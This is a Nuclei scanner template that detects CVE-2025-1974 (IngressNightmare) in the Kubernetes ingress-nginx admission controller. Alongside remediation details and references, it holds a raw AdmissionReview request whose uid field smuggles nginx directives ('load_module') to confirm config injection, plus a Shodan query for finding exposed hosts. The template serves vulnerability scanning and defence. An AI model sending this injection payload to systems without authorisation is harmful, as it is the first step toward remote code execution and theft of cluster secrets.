id: CVE-2025-1974 info: name: Ingress-Nginx Controller - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch,UNC1739 severity: critical description: | A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.) impact: | Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover. remediation: | Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later reference: - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities - https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx - https://nvd.nist.gov/vuln/detail/CVE-2025-1974 - https://https://github.com/kubernetes/kubernetes/issues/131009 - https://github.com/eeeeeeeeee-code/POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-1974 cwe-id: CWE-653 epss-score: 0.9113 epss-percentile: 0.99662 metadata: verified: true max-request: 1 shodan-query: ssl:"ingress-nginx" port:8443 tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,vuln variables: string: "{{to_lower('{{randstr}}')}}" http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1", "request": { "uid": "{{string}}", "kind": { "group": "networking.k8s.io", "version": "v1", "kind": "Ingress" }, "resource": { "group": "networking.k8s.io", "version": "v1", "resource": "ingresses" }, "requestKind": { "group": "networking.k8s.io", "version": "v1", "kind": "Ingress" }, "requestResource": { "group": "networking.k8s.io", "version": "v1", "resource": "ingresses" }, "name": "test-{{randstr}}", "namespace": "default", "operation": "CREATE", "userInfo": { "uid": "{{string}}" }, "object": { "kind": "Ingress", "apiVersion": "networking.k8s.io/v1", "metadata": { "name": "test-{{randstr}}", "namespace": "default", "creationTimestamp": null, "uid": "InjectTest#;\n\n}\n}\n}\nload_module test;", "annotations": { "nginx.ingress.kubernetes.io/mirror-target": "fake-mirror-target" } }, "spec": { "ingressClassName": "nginx", "rules": [ { "host": "test.example.com", "http": { "paths": [ { "path": "/", "pathType": "Prefix", "backend": { "service": { "name": "kubernetes", "port": { "number": 443 } } } } ] } } ] }, "status": { "loadBalancer": {} } }, "oldObject": null, "dryRun": true, "options": { "kind": "CreateOptions", "apiVersion": "meta.k8s.io/v1" } } } matchers: - type: word part: body words: - 'AdmissionReview' - 'load_module' - 'directive is specified too late' condition: and # digest: 4a0a00473045022100fcb81f24967bd06062fcc0f6c8bca3930b04d97a8dcadf22241dd78afcb723e602200e546424b01f94a942d94142a03f050b8e07ef6177a89e512bf93096b8eca835:922c64590222798bb761d5b6d8e72950